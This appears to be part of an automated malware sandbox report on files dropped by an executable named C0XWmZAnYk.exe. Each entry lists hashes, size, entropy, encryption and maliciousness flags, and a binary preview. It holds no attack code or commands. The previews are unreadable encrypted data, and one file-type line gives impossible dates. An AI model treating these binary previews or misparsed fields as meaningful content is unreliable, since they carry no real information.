              SSDEEP:3072:ZStzHLi06499V3VFz5NZpPl74cXG/LhwxMosSGRulq:+K4ZvzVpd9Wjuqclq
              MD5:14585073C72734E51EC26B012984E40E
              SHA1:DDF50C6E499B6D0F4BE403517D9335BBCB554645
              SHA-256:23FF10F3F9FB312616507A084E420E8949DEDFD6E7E4E1DAED5B86EA021726FD
              SHA-512:4163EF7741F38CFFCD375458735CD7A822135F1658DA1EA5659CEF4E758385C361B25B31DB6CB4D856FD97D43145846275CD9ECCC45B437F4AFD4F6EC1C53B32
              Malicious:true
              Preview:[{"Sy<.-..|.K.l?.........*.~...f4$=!R._.........V......9.UQT..t....b....F.....y.*.Ki..i..x~|.......v.A...>...-..U...l....sLf....NXO......bb7.....?.!.8.>..8.(.W\8.R..v...5.Bx..x.b..(.!...-dN.]:.OHC.k."wi...t]l..lD..X.pDB.ku".....`/....)m..Cz.x.yz.O....C..av...t.*.6#.leZ.<...V.e.l......k|.d....C.5....n{.........{../.?..>.g:...m....LV..........^...-..+.O....b.R.......3>>Q..q....C..e.."../o#B. ~.5.3...t.....7.B.x:pQ...6.c.<&{..@!..................\..}..{..y....S.&Wyx@..}...V.%L.-....kXc.u.V......./.@...S..<......I...?....~.?....UFa3.sY))".C.........\&...<.=2....Pxp.U..1h..*..`..2...u6..p.^...,..r[.IM%..-.....\]...&Cz....S.V... ..K.....x..H....&K2B...q9..j..F.Z....A..3..^!%..v..&.G..;U..}....S.)A..Y8{.A'..^C'?.......{.@pm....H.7.7.2..P.f..S..4._F.>..CDa..%J.$.e.......!..B..6'.O.....x..gv.o...X"...;...z..f..X)$/..."4.=...e.C....ec..#m._.....H..;.A$..........,.^.....F&"...n..zUY.Rp2..xm ...j)..T .C....(..X...n.....U.B.{.....N'!_y.]j.$Rh...
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):118507
              Entropy (8bit):7.99852943602928
              Encrypted:true
              SSDEEP:1536:3UvQIFmO9Rvfm/FdGG6VTeMVA89YX3zROnx4IZuJ3JGXb/l7ltHO93lXXQyv10I:EvgOTfeFdGbtazROnHuJ5O/NTuVuo15
              MD5:56F92FF3531A1D2FA5E6B3A8CABD4023
              SHA1:888A2089045DF0D13B5656487CE103821B0CF9D2
              SHA-256:A0B16C7811CAB1E7FDD85363972280F28B2050D3EF63E55F4282BD50A2E5FF46
              SHA-512:36677F26B0FA85303B144030AF8A8AFF7100094EA50D1C7546129D26379F2374AD0EA643FE3FD7596EBC9E4B9DA1EAFC651D3F3BB86072D446044CAEB445E6F2
              Malicious:true
              Preview:[{"Sy...2.b...sM..X:...9...C.b..>..-..k`...z.G......)....b..`...p.>.........wbH.....,..<-..I..*.....h..M.mv2.U......>.k...p*..+.x/.....k%./....ZEA..W.,.=Cd.Yn..5v...9....5u..2.MTgy.....Y%..-..v3*...J...(...EgR..v..-..-.%.....J.....,.Xz...9R.. .K..T.y...+b...#..eX..F..."B.`...d../..I.E...M......m.....i.KO~N....%B....28...q:..W..\@.g.$..........<[4<1 J..?.^.4/.s..X........l`;.l...S|....6}Y...!|..>xp...9..g.%......~.v).I..U5p.W.Y....&.......S.Y.G>@........5j./...,.h.R..Y..y....^...a.I.P.Z.).I1:.....k.{........Y..vx.).t....6.i.\....SB.l..w..}I>{....... ....|w.&..G.B...24..U_.......C.lWL....M...s.,t3.V.F.......b...0.2..qa.w_..9..V6.V.K.....f..".[.;..6.a<6.K.>j..g.d.~..`7......1..?Nc...G..c`.<...I....+..R.X..R.3.D.M...Wy...j._?L.Z."+..bf.%..5.......^.R.o...$..._.Y.+.(......#=.vaA%3.%...M...C.....9....$J...C<....n.G..<.........Y..Pa.84z../..tF.lf.....Ya...'.m....H...&....~').)j..(..L...[...-=`&M.......d...]g._=........TFTDT...VW..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:Macintosh HFS Extended version -289 data (mounted) (locked) last mounted by: '\376', created: Wed Jan 3 13:18:18 2018, last modified: Sat Aug 14 06:24:47 2088, last backup: Wed Nov 28 12:43:13 1990, block size: -1419597396, number of blocks: -1408063186, free blocks: -1067998487
              Category:dropped
              Size (bytes):118525
              Entropy (8bit):7.998448632195325
              Encrypted:true
              SSDEEP:3072:dDGKDIbKu4bdrZ6HwxOzh4BN5iYw8DPty/1ANEBTg:9G0LZrZ+zh43rwmPtgACTg
              MD5:84AE2978A944A8FE73E09040E500DAC6
              SHA1:C15CB7B4391C3B319197C3DA859D7C0DF6C0436B
              SHA-256:C9AC84983E7BC5D914434371C57DA6502EE876434D96FC2495531B83CE18FC5C
              SHA-512:EA9475A2BC22E0544ECA7AC5E9064793CC1904E2F23148063216A5092494D2A09035D466238EC771E434F253E3397D1B7BBF10F73054DA1062E2F993834F2CD7
              Malicious:true
              Preview:[{"Sy.qQ...-.wl...#.....3.Y.T[....PX..v....yh..ms<M.{.n*.J.r....39..9qk.Iy...=6..+O...d...}w...na.F].....w.7.|..3Z8K.Y...?."c......B.f..0..u..n.0.;.R^..6...."W,.)..).f..Y(....gi.:ul.......4p.v$...`5.y+..ZW.C.Pt-X.....L......r.Rep%.U{.7..l(..R<5 ...lSF..l...xr3..'......h...64+..u....o..$V...`.Si.m.?..99.c...U...r.b.~..R.f..d.w _&....2.I..%..%2XV.w.....*)........t...2..e.Cc....o...`":..O..Q.....c;.:....X.!..L..\3.v........K...j.X.....#B}...L%.1..Q....0.T+..R^.\....4._..\.;<'..\..M`...x.....H.S.....7./O.X..2l....i.d.E.g.Di..O....<(!.T......9HEi...!]L.T.M..#...}.FG9c(3.7..6'm..@T1e."...K60..P...P..<.&.%3c...o,.....KZ..'ZB....F..X....]&.t..L....J...I.$...-5...N..jr.a;....@.......#=<....q.@..4.R....H..fm86D]P.*....^]Q..q...P9.Q...0...p...J...t.S.....kL....D.......jI....L..K..H...N."b/F&.....;.Nk..J.q.......x4"FW..A.q...)....0|....%.h^i....1R..M.A...-....MNv...RH../.WC..8.tx..N.o.C3...*......-.G.V.w4..{.6.....0..2_......\.e.g0..n.....d.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):118751
              Entropy (8bit):7.9983044019585705
              Encrypted:true
              SSDEEP:3072:kkTRPeuZxoF/zy4vquj/oUF1wPALSZvyyE0SdPHsIR:kseyxoJzy8qq/X1wPZvy10QHJ
              MD5:04A35F3B8039FA8D876ABD3B93E55C99
              SHA1:1CD232F99BDECB2C0817CD755FCB916CC9AA017C
              SHA-256:EBB6EE0A38A5CA8A3E066065928E4064C76EE9DEAD71837C9476E38FA9C56BF3
              SHA-512:93E32CC0E8A9B333A489820A041DDE2091395DA8BCF278C5007AD8C8DED4D64004F74319F8299C907E7C6D0B78A9446097E523ADB45C161E171C42B2E1B7289D
              Malicious:true
              Preview:[{"Sy..u=.{..3.H&..Z$/.;.......O..)E...!........L1..V7...E....nb4?...B....EK....k..:jlJkJ..Jn.......)ECh...$a*.#.....6.K+...q.X8PW)..`..JQJ.I.e.E..:Y.~....%7vZ.H`qa..6HW/...k...p.VA..kK&"D...17.SE..(k~}J....kU2....D.<k.FY(A.H.K.3OJ.H.)....9......S.A.q...4!9(....`.....Mb//Q\.H!.F...j.<..g...>W.x...*Qp-..I.5u;...".H..7..._.3nW..tX....(..!...*...NC...A6..#..u...?9/......b....!C..r.kp<.J...H.MC.>.op.|._.;.%W.r".t......>...:N#...BB:...4.. ....A..%.......fW/.t.6 (..R.`!.s.u.-..P.......13.V.G.1....`....a./..%......n1.f%+....k..QU+...........a./.........J......@......(.H........J.X@.qa.. p.9.99.Q"d.d@&....F.jRSI[R6k..Y.....$.`..6..M.'...Hj.9..a.....=.D....>.k..O..*#.}.T..........@9.W...J......xo..\...\NJ..v...[_....0.he....B...'$.y..?+O?.9.....i.......:~.W...[u..........g.0.....EZ.H.qS...d.zW...}1..(...\.}...g.,(h.....~U..>.T..-G.$.=.....|.)]..B1.3d.X..t...j..[I.3YM..&4.I.....5....X..M.>K.KVZh.........Ezm........k..^.."....;......ERN...*."y|...|o.e.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):117150
              Entropy (8bit):7.998452968418499
              Encrypted:true
              SSDEEP:1536:fLUUY5mSOsZQ3B0dNQey2aIiuRJjqbHwh+KxtQHBvi6mjl+HYkivHFidX0nW12Yu:fLUUYwBOkrIJAwhDxKvitBahivg0Wcx
              MD5:157F50CBA99D994BCC1678B3607F62A0
              SHA1:EC4519490E3053606C6B76122CB07FB0D3C81328
              SHA-256:2482624C913979A2D39527A537757C29455AD883CAA7F307D270865CCAC66A36
              SHA-512:17223971C25BA6F3FAA14A7006C12160B53AD193884923626CB3B733B62B76FEDC0925990FF1315F120CDD5EC00FDD54AA4D8DABDDFC9BD6383D1AD1378C52A5
              Malicious:true
              Preview:[{"Syb........] .!..N...m.2..o.....j.....!..3.3..3W.*6.......c{^=...Qj....=....K'.].>.].B..QR..o..9.....o).n..._s.......U,E..2e..W...U...<........N.w.&(..;.%.M.-...*J...'.M..1+..t.4..:!..g.A...Q;...5....F9u..+..4.......z..8.).{....k...s.hm...).8.._(Ld].K.^t.o..OE,b.h....qMSo.zQ....Z..?..$,VH...P.Q?a.<S...k..2xn..a...%]...-'.[...K_U....0...?..s1...!.....!.=..!h6.n..{......,W......9.4.2...4'/b.....S...oq.....x_.4.*2....J*1.!{{.~...]LGC...#.....C.^.;.._.`!Z$.&.P.#S<..}d..^..;....8.:.!...^.RF..O6.C.....n.p....n..C.g.n.R....b..].,ph@....4.H..O....ISm..\d..e..(..+.;b@}...k.Y.....0..'..E%..6.`4X>.....G.l.[........!?........D...X.;t..zg.7uu+.J.6s... .. ".[v%c.U......H...7ci8!#.."....dP.q..7i`.....*.....r1.g.%e0..q....a.....I{....&..s..b.@.......|.._..,q..:h. 2&...YN4...,/.a....F.`..<...k......S.......=Z.QL...%0......eS.G..X.\.rE....uw..|Tue..P.H.!.%.L......t.@POJh..(...R7U.>..T..MB.,gr.[-....l\..x..KQ.;.v.9.......ouz....-..u..vv..8.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):115176
              Entropy (8bit):7.998266681810778
              Encrypted:true
              SSDEEP:3072:4uwKl9ie4Xtx7R3XDsgVSAqTV8oThKHbiTRb:wKlge4XtJmgVSLB8uhkbI
              MD5:77B707DFFA4134D2DAB60CD071B2993E
              SHA1:32981E6E1DB2C31C954668DBEE05AE04461559EF
              SHA-256:A74F85F496E67FDD68EDAAE927908CCD1F80A5E7E7087EDD3B6EEB7D8F2BAC46
              SHA-512:70121C0A41D6322FBFDFA0F1D979F624716C75637DC44A803A3DDB1009952369982B60BA3FACAEB8B34F255485F5BCC98D269CFD572D7D5D8D6E6B8E61CEE511
              Malicious:true
              Preview:[{"Sy..........%.8.......4...v.]8..)..}......u.....<&..B.V.c<\.p.......A...qi....tx..D#.\...G...a.T.6..0...F.DTm..zq.=`H.(?.._.GKAS.VM....E.a....:.17.\..h...U..".33...R.E.}p.mH.......M...0I&.......ta.NW#.G....@..!..&..) ..J.r_...J....3.h.&H+..o.mn..p...s6:;..x..{.V...0.*:TM.`...a....EFQ.v...{!...n...|.............<?tS.[.V\.O.%E.q.....D..$.E.....p.==.t....+......E'.FA.$-'`8..i1..@...G....J...~z..k.w....]1..M?.......%....1...E..)cN7...!.....]..`.....[....:P.P..L..........aWS.1H.o}....0......X`....8....Ks...b.)...K(.. ..o.?w{..NcD'.M....@Uq>.%.I..D.x.IB.....Y[Fx.0.fo)!!).+.{x.. ...V....k.%2.Q./..j5v.....j...~.p....e....c..].NQ.o.w:..keo...S.$a....6.=.9>..q...h...O...Z.I....0..mK.+..{).V,..:.{EO..0...X.$.4..a..W.Nk....!.....W.e..my.CV.W...<....o/....Q ,7z...6.%Hp..A.R4_.-.l...B.!.....D.g.(N`..J...`E.......'y&.tJ..Sq..o...V..;.\..._..i.K..>M6o[.aiS#.3.4x.....f..X.T[x............j...v..T....{w..1%....Z.....>.m.<-.....z...........A.....&...
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):115177
              Entropy (8bit):7.998428344027954
              Encrypted:true
              SSDEEP:1536:esGBu5j50s8lqgCIsD4wwLsHB6zuf9obVwJoiiq6tt5xN7ZSjv6cZ+g8npJnN7hH:Fkq5v8kzHHccoRwJ+tb7ZCvk1VN7hoQN
              MD5:54B012AACF6D35E1FFB44A062D7FDDB0
              SHA1:5F78F6E17FE50978446C79725A9D79AF287F9EB0
              SHA-256:8682196E05D49D049020FF046207F4A1E9B4B64C63444989D18EDDC2A29B8FF2
              SHA-512:81E81EF82B02C4B571C8CBA0A2AD11EACC3FF43153D2653E05EA4BD89E5661B81720FC69CC2C40BB8755ADE013E70C7738F3277C1944C4ACD9369D07C6BAB11E
              Malicious:true
              Preview:[{"Sy..|...."...4.zU.~H.O.r7..u.b..9.#./'..D .o..}.+...J.DP&..+<.....1.?..*....gwP..R..L3.....I.V O....._..;.7......{......(.....*...N|........M..Z2R.....-.C0o...cLP:..vG.....t..h.`P..+..|...u..."T9.....ZeG....@r....}...g....'.......9.;&S.{..Q@.6\..LT.(.eq.mB1H.%DY..S.?. [>.h.M........#...../cR..D|.L...n~...........Kz........@......'...O..,`......M.!..izd.^.{Fo..b...M....7...AwC..-g..g.G.(..&...8.r.v......3.$....hM..ge.+..e..`....p8.R;..<.E....h...k..c....D.@8t......N.........C..Y},+.......h.C...H.F..s..j..\.D.)z.BK.R..N.x.L]...m.1.'..7........7........Q.....S.m.9..S.w....v/+....%."....|..R?.`^.gS..2....E...-..4......w...9..?.....p.'...8.....r..ECJC. ~.._N_.k...._.gcO.|........:;T.w...p~.i.h.=..].'2o.}...A..Q..S....(.*x......0.....F.....!.K.MN4.Y............X..p..6.$.O...w(.e.I.....l......kc...h...0..0..c...p..C'.g.E....~..,.I..M.l7Y......\.....8.....U.|.>....U5.3..!.... .....=.Q.Nq.`.Vp...9H....L.....\.7.'jc-.~2....m+.+..w.....s
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):115177
              Entropy (8bit):7.998207481650312
              Encrypted:true
              SSDEEP:3072:EFsBEMfexTc98zeelGi8UR08CDKGBCyjbCn4a:BB9GtqkXpNcDLLj9a
              MD5:B1D37A1B12529557C889E68200482234
              SHA1:F74F3361B36E812D16E6422398267A68948E9731
              SHA-256:DAEDC3A89FF4178E2E82C0BA2DDEC5AD7A2EE871D1950FCB7DCB22E6D7B7B81A
              SHA-512:759361A6316E7518C9D162B99EEAD1154AEA2612092419C79D14871BE39E2814CDAE0A3D89EF7211469A3C0C8A6632EB372B0A9BEA4464A81244441A080B9AD3
              Malicious:true
              Preview:[{"SyI.t&.*..(...4.f........f<I..........l......p...Qs.....qf..;.n-c.>6..Xe.......'..:P..\..Q..M.T..+.i..m.....4...l.cW.v...7..B.h.'q..AGI....`.....s+...(f^.....$d]..S..~...o..UA.....E.r....2.3..a(.C.....L~..T._BZ.i...-.7.H..X.o.yOn...^..g[..t.#X..3aV.?...f.;.Y=9.)(....#.#!.ON.......9..$=N.\.aT=...Q..- i..!.......Z..Ov.E...@..V.z.7e....*........R..axfY}....<.s'.Z....S.../2....{.....X:Y.;.t.....BY.jT.e..e....Q.>...bTE.........6w....|.....W.A.....V"..l..j.@D.&.....:.4..{@......C.Y..y....=v@$.....W....o(G..;..~A|..3^.x.Q.2[.."z...O.x..4...32........O...}..]..(8Vn.....S.}....h..yN..&.W':.nT...=..TxH...wN..T.].tO..i..t.....P.y.u...i...JOf..-.........M..v..S.,0..Y.B..U.6........h.yo...J{N.a..f................[..D....(..........P..Xm.k.6....VG..[.....<HM.....U...A..3....>.....z`.3)...E...D.{o..#x.o.N....~.....9p..S...#f.........,....E-.............hS. .<....q...7,kVC.....#qt..)..D.b.'.]9...z..^@.w.N......B^.t. /.-...|..&...l!....+.....
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):114335
              Entropy (8bit):7.998242681203208
              Encrypted:true
              SSDEEP:1536:k3jl5HBQvJNZ4pnOH8SMnaiDN8oDIQ8yoGu2qApIfwsiSki/b023B+6NfG8IWECe:c84pOanfzDz8y+2HpGXMqnQ6sMjybe0
              MD5:013C53179B04956CCD56E1F073DF826D
              SHA1:B33E7EE7857F8A4149663A52F7951F131BB5361C
              SHA-256:B17C4843EC33E2D24A745E9432B62D7E0AF8A77B081F2312F231984C5A6257C1
              SHA-512:1F0EE4292D5B6F709357548C78451F2A868FA8E0DA0FFF8CC211B7DF3F6D665620A032285948D022AD0C8C95FB3D9D3C37269886802C8A861B0480E1A18F7F07
              Malicious:true
              Preview:[{"SyZ..'....x.bw..=.... ,j..........6.q.rC..............B.....s..*.P.Tf.}.x..HG...@1I*YfFl.yFw2.C!.C..l.Y.@..d.(..l%....H&&.XT.....FKD/j.Q.Ax.s..a.X%-q_....P....&.3<%......S./.....l.r=U......V.Z..c.q%cwltr...MWC&...~...:.>....J....;.H[m.nL.?tG.^..c@.M.l....h....\N......z.9K..i.z...r..v.S}.....D....a..<JI..)..zA..1......B...qAR.S."..+_.."E...!.,.O.`}..fx.[.z.="-..%fF.:.....R...pG]...&....b.:-.3......hP.-...b...s."....p...<..3L..S._..;...[.#.#z?{../7..M..HGw.|..j.>........ApP..#j.M.....r....kM.?...}{T01vHS?..0..F..%..B.lN.0h.)....|......f....h"...c....L....1PH5a.I...0..........w.|:..Z......`.b.l&FO.M!..2.*E....u.v.S_..P.Z....x..%.lo.1.6.........m}'....(C....o...*7.? u...o.,......L...TW.... s.:q"..w....[gf>;J.....6......[&..ya..-.>7........!c.c.f....RS....xDX/2.1.>.&5..R<.2W..g...|..,..`a..e5..Z.r...h...$C@.Q.........<.C..v...\8l.K.!..|...Xe...c...4;....t.5..G..@.V...&J..1>..i.....\...F....T.u~!C....q.r..*...._&.@...0.P7......8n..0.u%.BV.N...
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):114335
              Entropy (8bit):7.998513604615262
              Encrypted:true
              SSDEEP:3072:nDsztqYnTqlS5RS+91VcwAZBc3sX4a6Wt6LcX0G/JPDxhllHJ:nD+thTna0+fSsIa6W03qPdhllHJ
              MD5:05631C35AA49685D037E66E0EC6C64FD
              SHA1:F129BC627E10B88F9A2523B5A93601A773404F32
              SHA-256:514FAF87622AC3F2D829A9063D8DFFC5FBA367A23E24D6713C39DF8DB25FFF96
              SHA-512:E73B396ABEE51BA6B35E1799063E31F1243C1EF2174AB80C87344A4092570676A8399C4EBD51B087E7B222084CB93456F648BD0B102A8BA713BBEEF191A6502E
              Malicious:true
              Preview:[{"Sy.u.R..>...;b.5YZ..<V....8.....1?x.Cx.F6.y..;.q...PH.jaxu3........w...^..A.........An>>v..R..y2..`..4.r.. .h05....f.]....g.,.X.zAe..5^]z.B...kZ.{.Ib.Q.../...../....w...-^]..Z......n..<.^sv.R...8...5..f..h*..{.)N.pe&.9N.B......9.z.,..n..{g ..F..S.03.(gtQ^LQ..%+mz.._..j!..~........$....h.j#...SU..U.%.!.-N..V+..<x.p.Gu......r...}.x.a....!..,M..ruw@....|..6...?.3fU;F......6..F...l.,.pE.0N.k4...2d...)...>.!.uK..U.>....$...}`........<.z....hZ..g..m..lo.I>4.V2....U=.6.....b...?...b/.LT.pk..yC..RA..r...w...F...l.c2.,...p....y.&82..\.Hs.....v.9..vt.&!..g....z].....&.c.d...K..+.........4..N....(.=..6]...&...`.kU#.....'.QU.BN.u.'..|iV..G..Z3\|...M.Yi....v...^Y.U....WI~O....{[.Q.x.......OK.%..P....z.-.Jd.!._.T.3@.a.iOzB&..Y.$.`.4.._.^.]8..(.+..........tj....8.K.5.._.8.....QN..{.&&.w......|....o...P.....g..;h.......F.gUm.^..h.....%....}.....d.(.b.)..8z...-..w1..i?..If...?.........{7..........<.j.CX....gso~..w.ng.?..9.a..;t.N..5...}J...
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):696930
              Entropy (8bit):6.208813075916057
              Encrypted:false
              SSDEEP:12288:fO//SqvYLC9oGotdYuMOCc5MpzgroTDLgg:QSUt1uMOCc5MpzgroTDLN
              MD5:F750358F8CD5C14E46B31C3EB015463A
              SHA1:143E9DD1A0EA6FF4720F5A236D1858B39D846382
              SHA-256:B75283CB0A3AEF39B3D08C231A6EC84715779FE2FE465BC346CD502D3CFA39B1
              SHA-512:769847E978E4ED48B215ECFEA724CF6FC29FD4D7550569541A91D2F4171D9F08DFA73C9CBB30867EDCD7C3B0AD93CAFED13C04D69B3D73F30EE091FE1A1400FA
              Malicious:true
              Preview:[{"Sy.}.$Q&........w..62n.hB.<..d\k.U1...#.v.C.DlP.3...A...4.m.4&._.....GE...R..Z..}.C....G.Je.}A.Z.>.b...5.x...9..0.)..t...r.r...H}#f...T5.....R....w.a......k.&..)g.F.....o."WW..w......>]S_ ;].....s.D....f..S..`.pI..0.7U...p;.E.x.0..E>w.;..z.>5S..?.4YX.b.@.f...f.a..........w..'.......qnQ......[.9..Z...)K..c...}...e....PU..,C.~lO...e:.MP..L.nB.ly..!|w.fl.._L{z..`.M......~f..........o"W..g..E...-..3h2A...[.P......G/.z.........?.F...1..$.;\.9...34R.."|..h;<O..l.....Eq..M..Z..;.rX....>.,?>.w.....)...Y.z......#.zq?..=Z.././.....W........&..m...tU..M)E...j!......?.M.Y....../v..[<..-(1..50/...@..k...Q.:...Ot.Z.n..q.=...1}..=.....C....t.-xBCb..0.4;& +.h.TB[j..../;Is..h..$....Rb9'.4......A..$/......... ...H...U.,,....M.Mi...n.?^?'..-!.4..,0.t.^s\..4.....v..b..(.0q..K.yc.3...kg....5.K.zO.,......l....t|..#..t.oUU....Ij.R..i.c.;o....3.B...L...v5jo.%.Z.I..`..1.[.$..)`M.d.J4..1M\!.N..V.".j.q..h|....."b... ...G...|Y..8.7.....:.(.....m...=.{......T.R..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.981857334865425
              Encrypted:false
              SSDEEP:192:5VvExq8ghsaek8hKBXVlQiaZiiWvvNe7rnzE438:0xJ+sdRyXfS4vN2XE4M
              MD5:A99C94FEB5B2ACAFFAED757C3D72C2B6
              SHA1:588239A91BBA973A2B6D8523424B268E3B582E78
              SHA-256:C1B5F9AC8ADCDE6842A6491BBFBC416D725E53349ED0A3A2CFB66FCB5B45B506
              SHA-512:2A43D30FB0AFED8E43E9A3E3FB3BAF2109390CD1AD7BFCFA2D5C071BDF84A536932A2F9C1B4350BC1893D95E610FAFE1B0F329B900EEC08A4023C439289EB166
              Malicious:false
              Preview:regf..;.......5..vpe./...~.$.Q.U.2..V.:...................6.: ...cl(...&...r..C..Ao.b..xm.....|.2.j.....}z.~..|.....-.?~...6.*'.Hb.....h..}.L.u!.e.....W2..I.[.....**\...4.......|......-...[.7....W...4.Y.c\Q..<.....L7c:..h......V...|..YuDa'..QV.6.y..C .../{B.....dE$.._.Y%@........~:.....R-.y.._...wap.3 ..N>)N.....R.s.s.s {mX.1&.P.Kt.T....?..iW...Ujyz..........Y.y=.6.4...-.26.....9.....E...PX..+7...q...x...:.%..N.]T........._........^.H..Y..:EbN.d.Jn.E./k....).c.............W...x}PY..0.m...t1....ZP..Y.k...k,......#Qa,.8z...k.5.;.K..\ ...vH....p?...S...........*V.Y..x~...2..fy-.;].U..O.I)(<.k...A).......$S..7.h...P..M........I*.=}Vj..cg(03.1#.H.o"z.H.9H.]. ....8..n."..MT....0J.......n .....>...[.P*>t.B-..!t.%...C.B.Ret....o...w.}...L.$mM.3..^.A'..r2....on..&..`..^]..'..d)........E.....V...5.>%R..W....`...e.vEU8..]...U!.&pa.M..I..$.2...0......1..u.S.J.X....9.......(....#V...j...E.....cF..b....}..+.d.........k..![.D.$..,.......+m"x
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.978947494322609
              Encrypted:false
              SSDEEP:192:9PZPgwYc2SAr0dumBMt0ATp7BT2KojEVc84K/7vCGJj8ymvCqoGlFku:9PZPqSAr0HBM3vT2qu84GxNWoWn
              MD5:E53799B93ADC8C2087F4EAD0C3DADF6E
              SHA1:97DE74F6373B644E83731075ABA0397AD539C80E
              SHA-256:22B42F4BB8C6C215E25DDACCF2EF7C94C2C58B67EB49537D725CEAE739A3C78C
              SHA-512:C94966FC51AA29CBA4959595D47F169032B4BEC33FFDADA83FD1543364B5AEC2EED0FD75229F879C8122138790DBF0E03AC13C4391E55766979978AA0B457AEB
              Malicious:false
              Preview:regf.t...C...w.=.I...;.Ru\..:..K{tc.Q8{......8h$,...w..0t.n&.~..^.H......L[..L.....7j.._............%.!.......'...b.i.Q..*.Q.......V.e..d.,....S.Kq.......I".....,.{.:UB.\H1$0.-...... B..2.$?.k..._r..L.[.`.V....VW.,....i90S7..W....'4.-AgH+..=....I.b..#.{..o1...$n....Bz..:..\.wp88.J.).e..S.M..\.jQ^.5..@U..Q.x...722.+.sS...@..c.G.GJ.JLC..2...........TX9.$vJ.G..~..l.-..s.IG\.h..0....k.fV..,.;0.p8Q.".A.;B.....=.....)`RoD.6.....@kp.b5~."d}...Ir..Y.=.w*...)0yj~b4F`..t.HK...w.G#Q..p.n...?R....H,...J..M...[.....Z.-...v...&t......;t..z$n.,W.p.-y...7..`UP.#./.7E.......^......x..m..C.@.".za.....pVm...PF+.......).6.R..m.j..&W...N.\.p.Z>.r.....U..'.o..,..F.d?.7.d.%Lo.....N&C......tj.....1 .y.}%A MHV......i....HJO.'..(;d..s..rq..y.J....G..x.+.J.."....<gW..b.JG.^t.`.(....4.9....O.tY...j....5*4_..&.o.,......P.....-.....ll..3...k..A.t.-.1A!....'...<.Zy.NZ.f;1...@...v.I.2...T.9..M...6.y..7 ..P..+.......1DOLZ.....6...Gk...L#............
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):615
              Entropy (8bit):7.593755403363151
              Encrypted:false
              SSDEEP:12:CMhyiCpvvfKj4TbTySxWYlQiOfLaPlHlzRwQUcu53xdxa3cii9a:fyDpvvFTySc/L4HlzROd53xd+bD
              MD5:253394BD3D1E0CC30759D1F71F2B4C93
              SHA1:1E0F7FFE9161492CFEAFDDC0D3DDC69CDEF098A2
              SHA-256:1C72DA1A9BBB1AB7FE808D2CBAEE6E635C576B7118652218F7415535E26EB59E
              SHA-512:AFA26C62513BEF14E79286E4786C58D8C78F95180FA97075E01027B2415BC23604713C5DFED9AAE673B96B6CEBC563089564B8208236C67C32369FB22E7C12D4
              Malicious:false
              Preview:[000:.s....r..oC.\..4.f]3....B..<..}..gi...!6.........3)....Y.MqW1..W.CWbX.H+_g(.-0.<./...O.r...[%.0...[-]?..>....]..*.J..N..9.e>..Q....Q.w.$..Sx.*..a...XD.yB.AERii..z..o.-....VhF.<.Q......|.:.B.z....IU.d..r...ZpKK........|.........A.D.*j....n.}..aq..D....kW@..$v.s&.$DG.e+..6?i4.b^>N.K.....h.R...j.1...~..fZ|.5.R.m...6.079...8.$l5.2..:%.'...F!f.e.r..+.>..*..=..e.#8K.9.9jq-Zl.]E.U.Kdz.8Q.p.3...]...D.q...........~.J...vRs....d..?..k..{...|.....=..uqk.E.....L....d.LP...0.R.@.)]?J....@y.y.>.*...g.*.Y........gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.975442513433841
              Encrypted:false
              SSDEEP:192:geUs/KxX5mr5rU4a2aiO7s/XGGRPbT6Px24jru07:ks/C+U4Lal70XdTT6djrL
              MD5:EE094671613AC33F5A7CAC0E6C2072D7
              SHA1:9A484BB34A5EF12898E7C9F6BCC0B4B013F8E21C
              SHA-256:A8D2B564AAF11D7FAE8AA5A4EDD7FC47E1E52783A48BA23881E385102A142D2A
              SHA-512:09E500AC4DEB6A555F99E09263921EB7283B42B0B3473401E5D13849C92C83EDE7A7B7D7DB4F4883BD911D0F90EEBFE06CAFC0704CDB26027170984621497D7D
              Malicious:false
              Preview:regf...c.`mY^...%q.P.P...o|F......,.../.."DX.+6z.?3,.b..T..U.T..>.['{......0#Z........nKW../.v.......h...Jn.t..G_.|.c......5..q..-4.X....J.6.....Ej.s.#..|!.h.'.L.h.Ze..=u...K....Z!.....ds.\...J[A<...z.x...y.pS....XtQ..d.;,#\.+..h.. 